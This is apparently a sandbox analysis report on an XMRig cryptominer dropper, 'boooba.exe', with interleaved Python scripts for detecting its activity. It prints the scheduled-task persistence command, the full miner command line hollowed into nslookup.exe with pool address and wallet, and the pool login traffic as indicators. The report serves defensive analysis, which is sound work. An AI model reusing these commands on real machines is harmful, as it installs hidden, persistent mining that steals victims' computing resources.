
Windows Analysis Report
boooba.exe

Overview

General Information

Sample name: boooba.exe
Analysis ID: 1545299
MD5: ef9e6a4bab77a1e5ed51669eabeba31d
SHA1: 43b67b32d2fd462f0cb9277ed974d63a5575fc8c
SHA256: ab41e347fec54af86ef8edd98c695a7e856a93a30cd07a89d7669896b419b92b
Tags: CoinMiner, exe, XMRig, user-NDA0E

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
DNS related to crypt mining pools
Detected Stratum mining protocol
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses nslookup.exe to query domains
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • boooba.exe (PID: 6628 cmdline: "C:\Users\user\Desktop\boooba.exe" MD5: EF9E6A4BAB77A1E5ED51669EABEBA31D)
    • conhost.exe (PID: 6768 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6904 cmdline: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7024 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • cmd.exe (PID: 7128 cmdline: "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • IOAshdohSha.exe (PID: 1516 cmdline: C:\Users\user\IOAshdohSha.exe MD5: EF9E6A4BAB77A1E5ED51669EABEBA31D)
          • conhost.exe (PID: 4136 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • nslookup.exe (PID: 5480 cmdline: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 MD5: F2E3950C1023ACF80765C918791999C0)
  • IOAshdohSha.exe (PID: 7084 cmdline: C:\Users\user\IOAshdohSha.exe MD5: EF9E6A4BAB77A1E5ED51669EABEBA31D)
    • conhost.exe (PID: 5348 cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe" MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sihost64.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe" MD5: 6A7E9885A2D01DF564B46F8F27258853)
        • conhost.exe (PID: 6064 cmdline: "C:\Windows\System32\conhost.exe" "/sihost64" MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • nslookup.exe (PID: 6288 cmdline: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100 MD5: F2E3950C1023ACF80765C918791999C0)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Yara matches in PCAP
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Yara matches in process memory dumps (5 of 134 entries shown)
Source | Rule | Description | Author | Strings
0000000D.00000002.2902391217.0000019A4A4B0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000000E.00000002.2901760284.0000029965517000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000000C.00000003.1794466299.000001F9F0E4A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  • 0x21d0e6:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
00000000.00000002.1692437543.0000000000B84000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Donutloader_5c38878d | unknown | unknown
  • 0x21d83d:$a: 24 48 03 C2 48 89 44 24 28 41 8A 00 84 C0 74 14 33 D2 FF C1

Yara matches in unpacked PEs (5 of 11 entries shown)
Source | Rule | Description | Author | Strings
12.2.nslookup.exe.140000000.0.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
12.2.nslookup.exe.140000000.0.raw.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x45b7b0:$a1: mining.set_target
  • 0x4564f8:$a2: XMRIG_HOSTNAME
  • 0x4585d8:$a3: Usage: xmrig [OPTIONS]
  • 0x4564d0:$a4: XMRIG_VERSION
12.2.nslookup.exe.140000000.0.raw.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
  • 0x462df1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
12.2.nslookup.exe.140000000.0.raw.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen
  • 0x4633b0:$s1: %s/%s (Windows NT %lu.%lu
  • 0x4641f8:$s2: \Microsoft\Libs\WR64.sys
  • 0x464490:$s3: \\.\WinRing0_
  • 0x45a7d8:$s4: pool_wallet
  • $s5: cryptonight (17 hits) at 0x3fab98, 0x3faba8, 0x3fabb8, 0x3fabc8, 0x3fabe0, 0x3fabf0, 0x3fac00, 0x3fac18, 0x3fac28, 0x3fac40, 0x3fac58, 0x3fac68, 0x3fac78, 0x3fac88, 0x3faca0, 0x3facb8, 0x3facc8
13.2.nslookup.exe.140000000.0.raw.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

              Bitcoin Miner

Source: Process started | Author: Joe Security
Data:
  Command / CommandLine / ProcessCommandLine: C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
  CommandLine|base64offset|contains: "+~~)
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\nslookup.exe
  ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
  ParentImage: C:\Windows\System32\conhost.exe
  ParentProcessId: 5348
  ParentProcessName: conhost.exe
  ProcessId: 6288
  ProcessName: nslookup.exe

              System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community
Data:
  Command / CommandLine / ProcessCommandLine: "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
  CommandLine|base64offset|contains:
  Image / NewProcessName / OriginalFileName: C:\Windows\System32\cmd.exe
  ParentCommandLine: "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"
  ParentImage: C:\Windows\System32\conhost.exe
  ParentProcessId: 6768
  ParentProcessName: conhost.exe
  ProcessId: 6904
  ProcessName: cmd.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-30T11:42:02.084648+0100 | 2826930 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 49731 | 212.47.253.124 | 10300 | TCP
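The two Sigma hits in this section and the process tree at the top of the report are all process-creation events: a cmd.exe child of conhost.exe registering an at-logon task with the highest run level whose target sits under the user profile, and nslookup.exe launched with a complete XMRig command line. The following Python is an added example, not code from Joe Sandbox, Sigma or XMRig, showing how a detection engineer would score such events. The events are constructed from the command lines the report lists (PID 4242 and its benign nslookup command line are invented as a control); the flag list, the "three or more flags" threshold and the system-image list are my own assumptions.

```python
"""Score Windows process-creation events for coinminer tradecraft.

Added example; not code from Joe Sandbox, Sigma or XMRig. EVENTS at the bottom
is constructed from the command lines in this report; PID 4242 is an invented
benign control. Flag list, threshold and image list are assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from ntpath import basename

# XMRig long options present on the report's nslookup.exe command line.
# Three or more on one command line is scored as miner usage (assumed threshold).
MINER_FLAGS = {
    "--algo", "--url", "--user", "--pass", "--randomx-mode",
    "--cpu-max-threads-hint", "--cpu-memory-pool", "--cinit-find-x",
}
# Windows binaries that take no such options: miner flags under one of these
# names mean the on-disk image was replaced in memory (process hollowing).
SYSTEM_IMAGES = {"nslookup.exe", "conhost.exe", "sihost.exe", "explorer.exe"}


@dataclass
class ProcEvent:
    pid: int
    image: str          # NewProcessName
    cmdline: str        # CommandLine
    parent_image: str   # ParentImage


def tokenize(cmdline: str) -> list[str]:
    """Split on whitespace but keep double-quoted runs whole; drop the quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def long_opts(tokens: list[str]) -> dict[str, str]:
    """Map --key=value and bare --key tokens to their values."""
    opts: dict[str, str] = {}
    for t in tokens:
        if t.startswith("--"):
            key, _, val = t.partition("=")
            opts[key] = val.strip('"')
    return opts


def schtasks_args(tokens: list[str]) -> dict[str, str]:
    """Map schtasks /switch tokens to the value that follows ('' for bare switches)."""
    args: dict[str, str] = {}
    for i, t in enumerate(tokens):
        if t.startswith("/"):
            nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
            args[t.lower()] = "" if nxt.startswith("/") else nxt
    return args


def analyze(ev: ProcEvent) -> list[str]:
    """Return one finding string per suspicious trait of a single event."""
    findings: list[str] = []
    tokens = tokenize(ev.cmdline)
    image = basename(ev.image).lower()
    parent = basename(ev.parent_image).lower()
    opts = long_opts(tokens)

    if len(MINER_FLAGS.intersection(opts)) >= 3:
        findings.append(f"miner CLI flags in {image}: pool={opts.get('--url', '?')} "
                        f"wallet={opts.get('--user', '?')}")
        if image in SYSTEM_IMAGES:
            findings.append(f"{image} is a Windows binary that takes no miner options; "
                            "its image was replaced in memory")
    # conhost.exe is the console host; it does not launch programs itself.
    if parent == "conhost.exe" and image != "conhost.exe":
        findings.append(f"{image} spawned by conhost.exe, which normally has no children")

    if any(t.lower() in ("schtasks", "schtasks.exe") for t in tokens):
        args = schtasks_args(tokens)
        if "/create" in args:
            target = args.get("/tr", "")
            why = []
            if args.get("/sc", "").lower() == "onlogon":
                why.append("runs at logon")
            if args.get("/rl", "").lower() == "highest":
                why.append("highest run level")
            if target.lower().startswith("c:\\users\\"):
                why.append("target under user profile")
            if why:
                findings.append(f"scheduled task {args.get('/tn', '?')!r} -> {target}: "
                                + ", ".join(why))
    return findings


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Findings keyed by PID, omitting events with none."""
    out: dict[int, list[str]] = {}
    for e in events:
        found = analyze(e)
        if found:
            out[e.pid] = found
    return out


# Constructed from the report's process tree (PIDs, images and command lines as
# listed there); PID 4242 is an invented benign control.
MINER_CMD = (
    'C:\\Windows/System32\\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto '
    "--cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 "
    "--cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 "
    "--user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG "
    "--pass= --cpu-max-threads-hint=100"
)
EVENTS = [
    ProcEvent(6904, r"C:\Windows\System32\cmd.exe",
              '"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" '
              r'/tr "C:\Users\user\IOAshdohSha.exe"',
              r"C:\Windows\System32\conhost.exe"),
    ProcEvent(6288, r"C:\Windows\System32\nslookup.exe", MINER_CMD,
              r"C:\Windows\System32\conhost.exe"),
    ProcEvent(4242, r"C:\Windows\System32\nslookup.exe", "nslookup.exe example.com",
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for pid, found in scan(EVENTS).items():
        print(pid)
        for line in found:
            print("  -", line)
```

The three checks are deliberately independent: renaming the miner to another system binary defeats the image list but not the flag count, dropping the CLI flags in favour of an embedded config defeats the flag count but not the conhost.exe parentage, and a task that is not at-logon still trips on the user-profile target.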


              AV Detection

Source: boooba.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Avira: detection malicious, Label: HEUR/AGEN.1344832
Source: C:\Users\user\IOAshdohSha.exe | Avira: detection malicious, Label: HEUR/AGEN.1344202
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | ReversingLabs: Detection: 73%
Source: C:\Users\user\IOAshdohSha.exe | ReversingLabs: Detection: 71%
Source: boooba.exe | ReversingLabs: Detection: 71%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe | Joe Sandbox ML: detected
Source: C:\Users\user\IOAshdohSha.exe | Joe Sandbox ML: detected
Source: boooba.exe | Joe Sandbox ML: detected

              Bitcoin Miner

Source: Yara match. File sources by type:
PCAP:
  dump.pcap
UNPACKEDPE:
  12.2.nslookup.exe.140000000.0.raw.unpack
  13.2.nslookup.exe.140000000.0.raw.unpack
  12.2.nslookup.exe.140000000.0.unpack
  13.2.nslookup.exe.140000000.0.unpack
MEMORY:
  0000000D.00000002.2902391217.0000019A4A4B0000.00000004.00000020.00020000.00000000.sdmp
  0000000E.00000002.2901760284.0000029965517000.00000004.00000001.00020000.00000000.sdmp
  0000000C.00000003.1794466299.000001F9F0E4A000.00000004.00000020.00020000.00000000.sdmp
  0000000D.00000002.2902391217.0000019A4A4F5000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1773661287.000001E32C45B000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1778567981.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1778062444.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1787144711.000001E32C45F000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1777354712.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1774881873.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1776176780.000001E32C457000.00000004.00000020.00020000.00000000.sdmp
  0000000E.00000002.2903432689.0000029966FF4000.00000004.00000800.00020000.00000000.sdmp
  0000000B.00000003.1782316167.000001E32C45C000.00000004.00000020.00020000.00000000.sdmp
  0000000E.00000002.2906554821.000002997F6D0000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp
  0000000D.00000002.2902391217.0000019A4A4B8000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp
  0000000E.00000002.2901760284.000002996549D000.00000004.00000001.00020000.00000000.sdmp
  0000000D.00000002.2902391217.0000019A4A50A000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1777548683.000001E32C456000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1781637275.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1785377801.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp
  0000000E.00000002.2901760284.00000299654CB000.00000004.00000001.00020000.00000000.sdmp
  0000000B.00000003.1779837512.000001E32C459000.00000004.00000020.00020000.00000000.sdmp
  0000000C.00000002.2900254186.0000000140751000.00000040.00000400.00020000.00000000.sdmp
  00000009.00000003.1779369936.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp
  0000000C.00000002.2902562928.000001F9F0DF8000.00000004.00000020.00020000.00000000.sdmp
  0000000C.00000002.2902562928.000001F9F0E0E000.00000004.00000020.00020000.00000000.sdmp
  0000000E.00000002.2903432689.0000029966FA1000.00000004.00000800.00020000.00000000.sdmp
  0000000D.00000002.2900249494.0000000140000000.00000040.00000400.00020000.00000000.sdmp
  00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp
  0000000C.00000002.2900254186.0000000140000000.00000040.00000400.00020000.00000000.sdmp
  00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp
  0000000C.00000002.2902562928.000001F9F0DF0000.00000004.00000020.00020000.00000000.sdmp
  0000000D.00000002.2900249494.0000000140751000.00000040.00000400.00020000.00000000.sdmp
  0000000B.00000003.1775687094.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1780288557.000001E32C455000.00000004.00000020.00020000.00000000.sdmp
  0000000C.00000002.2902562928.000001F9F0E49000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1779753714.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1784061209.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1779051954.000001E32C453000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1783041722.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1781787948.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1778886806.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1775201573.000001E32C458000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1777129699.000001E32C45A000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1774272742.000001E32C455000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1775332478.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1779467909.000001E32C452000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1772421269.000001E32C453000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1788508164.000001E32C45D000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1780781024.000001E32C458000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1776641956.000001E32C456000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1775882569.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1790022060.0000013CBC459000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1784241324.000001E32C451000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1772851303.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1773553446.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1772933403.000001E32C458000.00000004.00000020.00020000.00000000.sdmp
  0000000B.00000003.1774784480.000001E32C453000.00000004.00000020.00020000.00000000.sdmp
  00000009.00000003.1774354264.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp
MEMORYSTR:
  Process Memory Space: conhost.exe PID: 5348
  Process Memory Space: conhost.exe PID: 4136
Source: unknown | DNS query: name: xmr-eu1.nanopool.org
Source: global traffic | TCP traffic: 192.168.2.4:49730 -> 212.47.253.124:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 212.47.253.124:10300 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}.
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: cryptonight/0
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: -o, --url=URL URL of mining server
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Usage: xmrig [OPTIONS]
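The two TCP payloads above are the Stratum handshake: XMRig's first message on a pool connection is a JSON-RPC 2.0 "login" call carrying the wallet, an empty password, the agent string with the miner version, and the list of algorithms it can hash. The following Python is an added example, not code from Joe Sandbox, Suricata or XMRig, that pulls such logins out of a captured stream. The stream is constructed: its first line is the login message the report shows on 192.168.2.4:49730 -> 212.47.253.124:10300, as the report renders it (lowercased and without the trailing period), and its second line is an invented non-miner JSON-RPC message used as a control. The Monero address pattern and the agent regex are my own.

```python
"""Extract XMRig Stratum login messages from captured TCP payloads.

Added example; not code from Joe Sandbox, Suricata or XMRig. STREAM is
constructed: line 1 is the login this report shows (as rendered there,
lowercased), line 2 is an invented non-miner JSON-RPC message.
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass

AGENT_RE = re.compile(r"^(xmrig)/(\d+\.\d+\.\d+)", re.IGNORECASE)
# Monero address: 95 base58 characters starting with 4 (primary) or 8 (subaddress).
XMR_ADDR_RE = re.compile(r"^[48][1-9A-HJ-NP-Za-km-z]{94}$")


@dataclass
class StratumLogin:
    wallet: str
    password: str
    agent: str
    family: str | None      # "xmrig" when the agent string is XMRig's
    version: str | None
    algos: tuple[str, ...]  # algorithms the miner offers; RandomX is "rx/0"


def parse_stratum_login(line: bytes) -> StratumLogin | None:
    """Parse one newline-delimited JSON-RPC message; None unless it is a Stratum login."""
    try:
        msg = json.loads(line)
    except ValueError:          # malformed JSON or undecodable bytes
        return None
    if not isinstance(msg, dict) or msg.get("jsonrpc") != "2.0" or msg.get("method") != "login":
        return None
    params = msg.get("params") or {}
    agent = str(params.get("agent", ""))
    m = AGENT_RE.match(agent)
    return StratumLogin(
        wallet=str(params.get("login", "")),
        password=str(params.get("pass", "")),
        agent=agent,
        family=m.group(1).lower() if m else None,
        version=m.group(2) if m else None,
        algos=tuple(str(a) for a in params.get("algo") or []),
    )


def is_miner_login(login: StratumLogin) -> bool:
    """Three independent tells, OR'ed: a rewritten agent string, a login that is
    not a Monero address, or a trimmed algo list each defeat one check only."""
    return (login.family == "xmrig"
            or XMR_ADDR_RE.match(login.wallet) is not None
            or "rx/0" in login.algos)


def scan_stream(data: bytes) -> list[StratumLogin]:
    """Return every miner login in a newline-delimited TCP stream."""
    hits: list[StratumLogin] = []
    for line in data.split(b"\n"):
        if line.strip():
            login = parse_stratum_login(line)
            if login is not None and is_miner_login(login):
                hits.append(login)
    return hits


# Constructed stream: the report's login payload, then an invented control message.
STREAM = (
    b'{"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg","pass":"","agent":"xmrig/6.15.2 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2019","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","astrobwt"]}}\n'
    b'{"id":2,"jsonrpc":"2.0","method":"ping","params":{}}\n'
)
# Wallet exactly as it appears on the report's nslookup.exe command line.
CMDLINE_WALLET = "45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG"

if __name__ == "__main__":
    for hit in scan_stream(STREAM):
        print(f"{hit.family} {hit.version} wallet={hit.wallet[:8]}... algos={len(hit.algos)}")
```

Monero addresses are case-sensitive base58, so the lowercased wallet in the rendered payload does not pass the address check even though the command-line wallet does; the agent string and the rx/0 entry still classify the message, which is why the three tells are OR'ed rather than required together. Compare the pool login to a wallet recovered from the command line case-insensitively if the capture has been normalised the same way.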

              Networking

Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
